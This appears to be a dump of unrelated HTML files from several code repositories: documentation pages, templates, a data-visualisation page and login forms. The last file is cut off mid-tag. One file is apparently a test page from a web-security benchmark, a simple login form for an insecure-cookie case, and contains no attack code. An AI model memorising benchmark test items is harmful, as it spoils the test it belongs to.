{ font-size: 13px; padding: 2px 1em; /* 1 */ } #drupal-off-canvas .button:disabled, #drupal-off-canvas .button:disabled:active, #drupal-off-canvas .button.is-disabled, #drupal-off-canvas .button.is-disabled:active { border: 0; background: #555; color: #5c5c5c; font-weight: normal; cursor: default; } #drupal-off-canvas .button--danger { border-radius: 0; color: #c72100; font-weight: 400; text-decoration: none; } #drupal-off-canvas .button--danger:hover, #drupal-off-canvas .button--danger:focus, #drupal-off-canvas .button--danger:active { color: #ff2a00; text-decoration: none; text-shadow: none; } #drupal-off-canvas .button--danger:disabled, #drupal-off-canvas .button--danger.is-disabled { color: #737373; cursor: default; }
libdbi-drivers-0.8.3/drivers/sqlite3/dbd_sqlite3/c47.html
ysuarez/Evergreen-Customizations
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML ><HEAD ><TITLE >Installation</TITLE ><META NAME="GENERATOR" CONTENT="Modular DocBook HTML Stylesheet Version 1.79"><LINK REL="HOME" TITLE="sqlite3 driver manual" HREF="index.html"><LINK REL="PREVIOUS" TITLE="Introduction" HREF="c34.html"><LINK REL="NEXT" TITLE="Prerequisites" HREF="x50.html"></HEAD ><BODY CLASS="CHAPTER" BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#840084" ALINK="#0000FF" ><DIV CLASS="NAVHEADER" ><TABLE SUMMARY="Header navigation table" WIDTH="100%" BORDER="0" CELLPADDING="0" CELLSPACING="0" ><TR ><TH COLSPAN="3" ALIGN="center" >sqlite3 driver manual: A libdbi driver using the SQLite3 embedded database engine</TH ></TR ><TR ><TD WIDTH="10%" ALIGN="left" VALIGN="bottom" ><A HREF="c34.html" ACCESSKEY="P" >Prev</A ></TD ><TD WIDTH="80%" ALIGN="center" VALIGN="bottom" ></TD ><TD WIDTH="10%" ALIGN="right" VALIGN="bottom" ><A HREF="x50.html" ACCESSKEY="N" >Next</A ></TD ></TR ></TABLE ><HR ALIGN="LEFT" WIDTH="100%"></DIV ><DIV CLASS="CHAPTER" ><H1 ><A NAME="AEN47" ></A >Chapter 2. Installation</H1 ><DIV CLASS="TOC" ><DL ><DT ><B >Table of Contents</B ></DT ><DT >2.1. <A HREF="x50.html" >Prerequisites</A ></DT ><DT >2.2. <A HREF="x64.html" >Build and install the sqlite3 driver</A ></DT ></DL ></DIV ><P >This chapter describes the prerequisites and the procedures to build and install the sqlite3 driver from the sources.</P ></DIV ><DIV CLASS="NAVFOOTER" ><HR ALIGN="LEFT" WIDTH="100%"><TABLE SUMMARY="Footer navigation table" WIDTH="100%" BORDER="0" CELLPADDING="0" CELLSPACING="0" ><TR ><TD WIDTH="33%" ALIGN="left" VALIGN="top" ><A HREF="c34.html" ACCESSKEY="P" >Prev</A ></TD ><TD WIDTH="34%" ALIGN="center" VALIGN="top" ><A HREF="index.html" ACCESSKEY="H" >Home</A ></TD ><TD WIDTH="33%" ALIGN="right" VALIGN="top" ><A HREF="x50.html" ACCESSKEY="N" >Next</A ></TD ></TR ><TR ><TD WIDTH="33%" ALIGN="left" VALIGN="top" >Introduction</TD ><TD WIDTH="34%" ALIGN="center" VALIGN="top" >&nbsp;</TD ><TD WIDTH="33%" ALIGN="right" VALIGN="top" >Prerequisites</TD ></TR ></TABLE ></DIV ></BODY ></HTML >
it.unitn.lifecoach.model/doc/it/unitn/lifecoach/model/class-use/GraphPoint.html
keme686/LifeCoachService
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_51) on Tue Feb 04 13:39:29 CET 2014 --> <title>Uses of Class it.unitn.lifecoach.model.GraphPoint</title> <meta name="date" content="2014-02-04"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class it.unitn.lifecoach.model.GraphPoint"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../it/unitn/lifecoach/model/GraphPoint.html" title="class in it.unitn.lifecoach.model">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?it/unitn/lifecoach/model/class-use/GraphPoint.html" target="_top">Frames</a></li> <li><a href="GraphPoint.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class it.unitn.lifecoach.model.GraphPoint" class="title">Uses of Class<br>it.unitn.lifecoach.model.GraphPoint</h2> </div> <div class="classUseContainer">No usage of it.unitn.lifecoach.model.GraphPoint</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../it/unitn/lifecoach/model/GraphPoint.html" title="class in it.unitn.lifecoach.model">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?it/unitn/lifecoach/model/class-use/GraphPoint.html" target="_top">Frames</a></li> <li><a href="GraphPoint.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
products/templates/products/products.html
lobobabysaurus/NewAppearances
{% extends "base/base.html" %} {% load staticfiles %} {% block appJavascript %} <script src = "{% static "products/scripts/products.js" %}" ></script> {% endblock %} {% block appStylesheet %} <link rel="stylesheet" type="text/css" href="{% static "products/style/products.css" %}" /> {% endblock %} {% block body %} <div class="brands"> <!--Load all images as img elements--> {% for image in brandImages %} <img id="brand{{image.brand_name}}" src="{{image.brand_logo.url}}" alt="{{image.alt}}" height={{image.brand_logo.height}} width={{image.brand_logo.width}} /> <!--If products exist create a dialog div for them --> {% if image.products.all %} <div id="brand{{image.brand_name}}Dialog" class="brandProduct"> <!--Load the Dialog with products--> {% for product in image.products.all %} <div class="productLink"> <p><a href="{{product.product_link }}" target="_blank"> {{ product.product_name }} </a></p> </div> <div class="productPrice"> <p> {{ product.product_price }} </p> </div> {% endfor %} </div> {% endif %} {% endfor %} </div> {% endblock %}
china-food-security/demos/food.html
CSIS-iLab/cpower-viz
<!doctype html> <html class="no-js" lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable = no" /> <title>China Power | Food Security</title> <link rel="stylesheet" href="../bower_components/foundation/css/foundation.css" /> <link rel="stylesheet" type="text/css" href="../css/app.css"> <script src="../bower_components/modernizr/modernizr.js"></script> <script src="../bower_components/jquery/dist/jquery.min.js"></script> <script src="../bower_components/angular/angular.min.js"></script> </head> <body ng-app="app" ng-cloak ng-controller="mainCntrl"> <div class="row"> <div class="large-12 columns"> <h1>Food <small>(1870 - 2005)</small></h1> <hr/> </div> </div> <div class="row" style="position:relative;"> <aside class="large-2 small-2 columns panel years"> <h5>Years</h5> <ul class="side-nav"> <li ng-repeat="year in years"> <input ng-model="$parent.selected_year" type="radio" name="years" ng-value="year" id="year_{{ year }}"> <label for="year_{{ year }}">{{ year }}</label> </li> </ul> </aside> <div class="large-7 small-6 columns" role="content"> <article> <chord-diagram></chord-diagram> <h6 class="text-center">International Trade Flows <span>{{ selected_year }}</span></h6> </article> </div> <aside class="large-3 small-4 columns"> <h5>Filters</h5> <button class="button tiny right" ng-click="filters = {}; hasFilters = false;"> clear </button> <div class="panel"> <div ng-if="hasFilters === false" style="margin: 15px; opacity: 0.5;"> Click a country </div> <ul class="side-nav"> <li ng-repeat="filter in filters"> <input ng-model="filter.hide" id="{{ filter.name }}" type="checkbox"> <label for="{{ filter.name }}">{{ filter.name }}</label> </li> </ul> </div> </aside> <fieldset id="tooltip" class="row secondary"> <div class="large-12 small-12 columns"> <h6>{{ tooltip.sname }} imported from {{ tooltip.tname }} : $ {{ qFormat(tooltip.svalue) }}M</h6> {{ pFormat(tooltip.svalue/tooltip.stotal) }} of {{ tooltip.sname }}'s Total ($ {{ qFormat(tooltip.stotal) }}M) {{ pFormat(tooltip.svalue/tooltip.mtotal) }} of Total of $ {{ qFormat(tooltip.mtotal) }}M </div> <div class="large-12 small-12 columns"> <h6>{{ tooltip.tname }} imported from {{ tooltip.sname }} : $ {{ qFormat(tooltip.tvalue) }}M</h6> {{ pFormat(tooltip.tvalue/tooltip.ttotal) }} of {{ tooltip.tname }}'s Total ($ {{ qFormat(tooltip.ttotal) }}M) {{ pFormat(tooltip.tvalue/tooltip.mtotal) }} of Total of $ {{ qFormat(tooltip.mtotal) }}M </div> </fieldset> </div> <footer class="row"> <div class="large-12 columns"> <ul class="inline-list left"> <li>Colors by <a target="_blank" href="//en.wikipedia.org/wiki/Paul_Klee">Paul Klee</a></li> <li>Design by <a target="_blank" href="//www.delimited.io/blog">delimited.io</a></li> <li>Data from <a target="_blank" href="//www.correlatesofwar.org">Correlates of War</a></li> </ul> </div> </footer> <script src="../bower_components/d3/d3.min.js"></script> <script src="../bower_components/foundation/js/foundation.min.js"></script> <script src="../js/mainController.js"></script> <script src="../js/matrixFactory.js"></script> <script src="../js/chordDirective.js"></script> <script> $(document).foundation(); </script> </body> </html>
src/app/config/setores/setores.component.html
mckatoo/Patrimonial
<div class="card-panel col l6 m6 s12"> <div class="title z-depth-1 white-text"> <h4>Setores</h4><a class="waves-effect waves-light btn blue right title-btn" (click)="openModal()">Novo</a> </div> <table class="bordered highlight"> <thead> <tr> <th nowrap>Nome</th> <th nowrap class="center-align">Apagar</th> </tr> </thead> <tbody> <tr *ngFor="let setor of setores | async"> <td>{{setor.nome}}</td> <td class="center-align"><button class="btn-floating btn-small waves-effect waves-light red" (click)="apagar(setor.$key)"><i class="material-icons small">delete</i></button></td> </tr> </tbody> </table> <!-- Modal --> <div id="modal1" class="modal" materialize="modal" [materializeParams]="[{dismissible: false}]" [materializeActions]="modalActions"> <div class="modal-content"> <h4>Novo Setor</h4> <div class="row"> <form #f="ngForm" (ngSubmit)="onSubmit(f)" class="col s12"> <div class="input-field col s12 l6"> <div class="input-field col s12 l6"> <input type="text" placeholder="Setor" id="nome" class="validate" name="nome" ngModel> <label for="nome">Setor</label> </div> </div> </form> </div> </div> <div class="modal-footer"> <a class="modal-action modal-close waves-effect waves-green btn blue" (click)="closeModal(f)">Fechar</a> <a class="modal-action modal-close waves-effect waves-green btn blue" (click)="onSubmit(f)">Cadastrar</a> </div> </div> </div>
upload/templates/Toys/block_mostplayed.html
pozh/ProArcadeScript
<h2>Hot Games</h2> <div class="Box"> <ul> <!-- BEGIN DYNAMIC BLOCK: dynGame --> <li><a href="!GAMEURL!">!GAMETITLE!</a><!--: !PLAYS!--></li> <!-- END DYNAMIC BLOCK: dynGame --> </ul> </div> <div class="BoxFooter"></div>
Schrodinger/Schrodinger_2012_docs/python_api/api/schrodinger.application.desmond.enhanced_sampling.mexpParser.mexpParser.atom_return-class.html
platinhom/ManualHom
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>schrodinger.application.desmond.enhanced_sampling.mexpParser.mexpParser.atom_return</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body bgcolor="white" text="black" link="blue" vlink="#204080" alink="#204080"> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Home link --> <th>&nbsp;&nbsp;&nbsp;<a href="schrodinger-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >Suite 2012 Schrodinger Python API</th> </tr></table></th> </tr> </table> <table width="100%" cellpadding="0" cellspacing="0"> <tr valign="top"> <td width="100%"> <span class="breadcrumbs"> <a href="schrodinger-module.html">Package&nbsp;schrodinger</a> :: <a href="schrodinger.application-module.html">Package&nbsp;application</a> :: <a href="schrodinger.application.desmond-module.html">Package&nbsp;desmond</a> :: <a href="schrodinger.application.desmond.enhanced_sampling-module.html">Package&nbsp;enhanced_sampling</a> :: <a href="schrodinger.application.desmond.enhanced_sampling.mexpParser-module.html">Module&nbsp;mexpParser</a> :: <a href="schrodinger.application.desmond.enhanced_sampling.mexpParser.mexpParser-class.html">Class&nbsp;mexpParser</a> :: Class&nbsp;atom_return </span> </td> <td> <table cellpadding="0" cellspacing="0"> <!-- hide/show private --> <tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink" onclick="toggle_private();">hide&nbsp;private</a>]</span></td></tr> <tr><td align="right"><span class="options" >[<a href="frames.html" target="_top">frames</a >]&nbsp;|&nbsp;<a href="schrodinger.application.desmond.enhanced_sampling.mexpParser.mexpParser.atom_return-class.html" target="_top">no&nbsp;frames</a>]</span></td></tr> </table> </td> </tr> </table> <!-- ==================== CLASS DESCRIPTION ==================== --> <h1 class="epydoc">Class atom_return</h1><p class="nomargin-top"></p> <pre class="base-tree"> object --+ | <a href="schrodinger.application.desmond.antlr3.recognizers.RuleReturnScope-class.html">antlr3.recognizers.RuleReturnScope</a> --+ | <a href="schrodinger.application.desmond.antlr3.recognizers.ParserRuleReturnScope-class.html">antlr3.recognizers.ParserRuleReturnScope</a> --+ | <strong class="uidshort">mexpParser.atom_return</strong> </pre> <hr /> <!-- ==================== INSTANCE METHODS ==================== --> <a name="section-InstanceMethods"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Instance Methods</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-InstanceMethods" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.desmond.enhanced_sampling.mexpParser.mexpParser.atom_return-class.html#__init__" class="summary-sig-name">__init__</a>(<span class="summary-sig-arg">self</span>)</span><br /> x.__init__(...) initializes x; see help(type(x)) for signature</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td colspan="2" class="summary"> <p class="indent-wrapped-lines"><b>Inherited from <code><a href="schrodinger.application.desmond.antlr3.recognizers.ParserRuleReturnScope-class.html">antlr3.recognizers.ParserRuleReturnScope</a></code></b>: <code><a href="schrodinger.application.desmond.antlr3.recognizers.ParserRuleReturnScope-class.html#getStart">getStart</a></code>, <code><a href="schrodinger.application.desmond.antlr3.recognizers.ParserRuleReturnScope-class.html#getStop">getStop</a></code> </p> <p class="indent-wrapped-lines"><b>Inherited from <code><a href="schrodinger.application.desmond.antlr3.recognizers.RuleReturnScope-class.html">antlr3.recognizers.RuleReturnScope</a></code></b>: <code><a href="schrodinger.application.desmond.antlr3.recognizers.RuleReturnScope-class.html#getTemplate">getTemplate</a></code>, <code><a href="schrodinger.application.desmond.antlr3.recognizers.RuleReturnScope-class.html#getTree">getTree</a></code> </p> <p class="indent-wrapped-lines"><b>Inherited from <code>object</code></b>: <code>__delattr__</code>, <code>__format__</code>, <code>__getattribute__</code>, <code>__hash__</code>, <code>__new__</code>, <code>__reduce__</code>, <code>__reduce_ex__</code>, <code>__repr__</code>, <code>__setattr__</code>, <code>__sizeof__</code>, <code>__str__</code>, <code>__subclasshook__</code> </p> </td> </tr> </table> <!-- ==================== PROPERTIES ==================== --> <a name="section-Properties"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Properties</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-Properties" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td colspan="2" class="summary"> <p class="indent-wrapped-lines"><b>Inherited from <code>object</code></b>: <code>__class__</code> </p> </td> </tr> </table> <!-- ==================== METHOD DETAILS ==================== --> <a name="section-MethodDetails"></a> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Method Details</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-MethodDetails" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> </table> <a name="__init__"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">__init__</span>(<span class="sig-arg">self</span>)</span> <br /><em class="fname">(Constructor)</em> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>x.__init__(...) initializes x; see help(type(x)) for signature</p> <dl class="fields"> <dt>Overrides: object.__init__ <dd><em class="note">(inherited documentation)</em></dd> </dt> </dl> </td></tr></table> </div> <br /> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Home link --> <th>&nbsp;&nbsp;&nbsp;<a href="schrodinger-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >Suite 2012 Schrodinger Python API</th> </tr></table></th> </tr> </table> <table border="0" cellpadding="0" cellspacing="0" width="100%%"> <tr> <td align="left" class="footer"> Generated by Epydoc 3.0.1 on Tue Sep 25 02:22:58 2012 </td> <td align="right" class="footer"> <a target="mainFrame" href="http://epydoc.sourceforge.net" >http://epydoc.sourceforge.net</a> </td> </tr> </table> <script type="text/javascript"> <!-- // Private objects are initially displayed (because if // javascript is turned off then we want them to be // visible); but by default, we want to hide them. So hide // them unless we have a cookie that says to show them. checkCookie(); // --> </script> </body> </html>
src/main/webapp/securecookie-00/BenchmarkTest02508.html
h3xstream/Benchmark
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <script src="/benchmark/js/jquery.min.js"></script> <script type="text/javascript" src="/benchmark/js/js.cookie.js"></script> <title>BenchmarkTest02508</title> </head> <body> <form action="/benchmark/securecookie-00/BenchmarkTest02508" method="POST" id="FormBenchmarkTest02508"> <div><label>Please enter your details:</label></div> <br/> <div><label>Email:</label></div> <div><input type="text" id="email" name="email"></input></div> <div><label>Password:</label></div> <div><input type="text" id="password" name="password" value=""></input></div> <div>&nbsp;</div> <div><label>Parameter: BenchmarkTest02508 <BR> Value:</label> <input type="text" id="BenchmarkTest02508" name="BenchmarkTest02508" value="whatever"></input></div> <br/> <div><input type="submit" value="Login" /></div> </form> </body> </html>
icheck/src/main/webapp/ui/login/view/login.html
RockeyHoo/icheck
#set($layout = "/layout/empty.vm") <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="pragma" content="no-cache"> <meta http-equiv="cache-control" content="no-cache"> <meta http-equiv="expires" content="0"> <title>iCheck Platform</title> <style type="text/css"> body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; overflow:hidden; } .STYLE3 {font-size: 12px; color: #adc9d9; } .STYLE7 {font-size: 12px; color: #FF0000; } </style> <script type="text/javascript"> function checkUser(name){ var username=document.getElementById('username').value; var password=document.getElementById('password').value; if(username==''){alert('请输入用户名!');return false;} if(password==''){alert('请输入密码!');return false;} return true; } </script> </head> <body bgcolor="#152753"> <div style="width: 100%"> <form action="login.service" onsubmit="return checkUser();" method="post" id="form1"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td bgcolor="#1075b1">&nbsp;</td> </tr> <tr> <td height="608" background="../ui/login/images/login_03.gif"><table width="847" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td height="318" background="../ui/login/images/login_04.gif">&nbsp;</td> </tr> <tr> <td height="84"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="381" height="84" background="../ui/login/images/login_06.gif">&nbsp;</td> <td width="162" valign="middle" background="../ui/login/images/login_07.gif"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="44" height="24" valign="bottom"><div align="right"><span class="STYLE3">用户</span></div></td> <td width="10" valign="bottom">&nbsp;</td> <td height="24" colspan="2" valign="bottom"> <div align="left"> <input type="text" id="username" name="username" value="$!{username}" style="width:100px; height:17px; background-color:#87adbf; border:solid 1px #153966; font-size:12px; color:#283439; "> </div></td> </tr> <tr> <td height="24" valign="bottom"><div align="right"><span class="STYLE3">密码</span></div></td> <td width="10" valign="bottom">&nbsp;</td> <td height="24" colspan="2" valign="bottom"> <input type="hidden" id="passwordbak" name="passwordbak"/> <input type="password" id="password" name="password" value="$!{password}" style="width:100px; height:17px; background-color:#87adbf; border:solid 1px #153966; font-size:12px; color:#283439; " maxlength="13" onkeydown="enterIn(event);"/></td> </tr> <tr> <td height="24" valign="bottom"><div align="right"></div></td> <td width="10" valign="bottom">&nbsp;</td> <td height="24" valign="bottom" colspan="2"> </tr> </table></td> <td width="26"><img src="../ui/login/images/login_08.gif" width="26" height="84"></td> <td width="67" background="../ui/login/images/login_09.gif"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="25"> <div align="center"> <input type="submit" style="background: url('../ui/login/images/dl.gif');width:57px;height:20px;border: 0px;" value=""/> </div> </td> </tr> <!-- <tr> <td height="25"> <div align="center"> <input type="reset" style="background: url('../ui/login/images/cz.gif');width:57px;height:20px;border: 0px;" value=""/> </div> </td> </tr> --> </table></td> <td width="211" background="../ui/login/images/login_10.gif">&nbsp;</td> </tr> </table></td> </tr> <tr> <td valign="top" height="206" align="center" background="../ui/login/images/login_11.gif"><FONT SIZE="1">&nbsp;<br></FONT> <span class="STYLE7">$!{errMsg}</span><br/> <br/> <br/> <br/> <br/> <span class="STYLE3">Copyright &copy; 2013 rockeyhoo@163.com . All Rights Reserved. <br/> </span> </td> </tr> </table></td> </tr> <tr> <td bgcolor="#152753" align="center">&nbsp;</td> </tr> </table> <script type="text/javascript"> if (document.getElementById('username').value == '') { document.getElementById('username').focus(); } else { document.getElementById('password').focus(); } function enterIn(evt){ var evt=evt?evt:(window.event?window.event:null);//兼容IE和FF if (evt.keyCode==13){ document.getElementById('form1').submit(); } } </script> </form> </div> </body> </html>
template/preferenze/configPreventivo.form.html
StebaKite/ellipse
<div id="body"> <div id="main"> <form method="post" action="%azione%" > <h2>%ml.modificaConfigPreventivo%</h2> <table class="datiCreate"> <tbody> <tr> <td>%ml.nota1ValiditaPreventivo% :</td> <td colspan="2" class="tooltip"><input required name="nota1validita" size="60" maxlength="100" title="%ml.nota1validitapreventivoTip%" value="%nota1validita%"/></td> </tr> <tr> <td>&nbsp;</td> <td class="tooltip"><input class="spinner" required name="validitagiornipreventivo" size="10" maxlength="10" title="%ml.validitagiornipreventivoTip%" value="%validitagiornipreventivo%"/></td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td colspan="2" class="tooltip"><input required name="nota2validita" size="60" maxlength="100" title="%ml.nota2validitapreventivoTip%" value="%nota2validita%"/></td> </tr> <tr><td colspan="2"><h3>%ml.layoutStampaPreventivo%</h3></td></tr> <tr> <td>%ml.preventivoRiassuntivo% :</td> <td> <div class="radioset"> <input type="radio" id="riassuntivo" name="stampaPreventivoRiassuntivo" %preventivoRiassuntivoSi% value="si"/><label for="riassuntivo">%ml.si%</label> <input type="radio" id="dettagliato" name="stampaPreventivoRiassuntivo" %preventivoRiassuntivoNo% value="no"/><label for="dettagliato">%ml.no%</label> </div> </td> <td valign="middle"><i class="smallNote">Le voci di intervento verranno elencate e conteggiate</i></td> </tr> <tr> <td>%ml.sezioneIntestazione% :</td> <td> <div class="radioset"> <input type="radio" id="intestato" name="sezioneIntestazione" %sezioneIntestazioneSi% value="si"/><label for="intestato">%ml.si%</label> <input type="radio" id="libero" name="sezioneIntestazione" %sezioneIntestazioneNo% value="no"/><label for="libero">%ml.no%</label> </div> </td> <td valign="middle"><i class="smallNote">Il preventivo verr&agrave; emesso su carta intestata</i></td> </tr> <tr> <td>%ml.sezioneDatiAnagraficiPaziente% :</td> <td> <div class="radioset"> <input type="radio" id="datiAnagraficiPazientePresenti" name="sezioneDatiAnagraficiPaziente" %sezioneDatiAnagraficiPazienteSi% value="si"/><label for="datiAnagraficiPazientePresenti">%ml.si%</label> <input type="radio" id="datiAnagraficiPazienteAssenti" name="sezioneDatiAnagraficiPaziente" %sezioneDatiAnagraficiPazienteNo% value="no"/><label for="datiAnagraficiPazienteAssenti">%ml.no%</label> </div> </td> <td valign="middle"><i class="smallNote">Verranno riportati i dati anagrafici salienti del paziente</i></td> </tr> <tr> <td>%ml.sezioneNotaValidita% :</td> <td> <div class="radioset"> <input type="radio" id="notaValiditaPresente" name="sezioneNotaValidita" %sezioneNotaValiditaSi% value="si"/><label for="notaValiditaPresente">%ml.si%</label> <input type="radio" id="notaValiditaAssente" name="sezioneNotaValidita" %sezioneNotaValiditaNo% value="no"/><label for="notaValiditaAssente">%ml.no%</label> </div> </td> <td valign="middle"><i class="smallNote">Verr&agrave; riportata una nota che evidenzier&agrave; la validit&agrave; del preventivo</i></td> </tr> <tr> <td>%ml.sezioneFirmaAccettazione% :</td> <td> <div class="radioset"> <input type="radio" id="firmaAccettazionePresente" name="sezioneFirmaAccettazione" %sezioneFirmaAccettazioneSi% value="si"/><label for="firmaAccettazionePresente">%ml.si%</label> <input type="radio" id="firmaAccettazioneAssente" name="sezioneFirmaAccettazione" %sezioneFirmaAccettazioneNo% value="no"/><label for="firmaAccettazioneAssente">%ml.no%</label> </div> </td> <td valign="middle"><i class="smallNote">Verr&agrave; emesso lo spazio per apporre la firma di accettazione</i></td> </tr> <tr> <td>%ml.sezionePianoPagamento% :</td> <td> <div class="radioset"> <input type="radio" id="pianoPagamentoPresente" name="sezionePianoPagamento" %sezionePianoPagamentoSi% value="si"/><label for="pianoPagamentoPresente">%ml.si%</label> <input type="radio" id="pianoPagamentoAssente" name="sezionePianoPagamento" %sezionePianoPagamentoNo% value="no"/><label for="pianoPagamentoAssente">%ml.no%</label> </div> </td> <td valign="middle"><i 